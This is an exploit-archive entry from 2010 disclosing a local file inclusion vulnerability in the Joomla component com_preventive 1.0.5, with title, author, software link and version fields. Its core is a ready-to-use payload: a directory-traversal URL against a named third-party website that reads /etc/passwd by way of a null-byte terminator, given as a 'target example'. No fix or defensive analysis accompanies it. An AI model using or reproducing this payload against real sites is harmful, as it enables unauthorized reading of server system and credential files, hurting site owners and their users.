id: 11720
date: 04/11/2010
title: Joomla Component com_preventive LFI Vulnerability
author: AntiSecurity
cves: 

=================================================
Joomla Component com_preventive LFI Vulnerability
=================================================

# Exploit Title:
Joomla Component Preventive And Reservation LFI Vulnerability
 
# Date:
April 11 2010
 
# Author:
AntiSecurity
 
# Software Link:
http://www.joomla.ternaria.com/
 
# Version:
com_preventive version 1.0.5
 
# Tested on:
Linux
 
# Target example
http://www.apartmentskolasin.com/index.php?option=com_preventive&controller=../../../../../../../../../../../../../../../etc/passwd%00



#  0day.today [2023-03-22]  #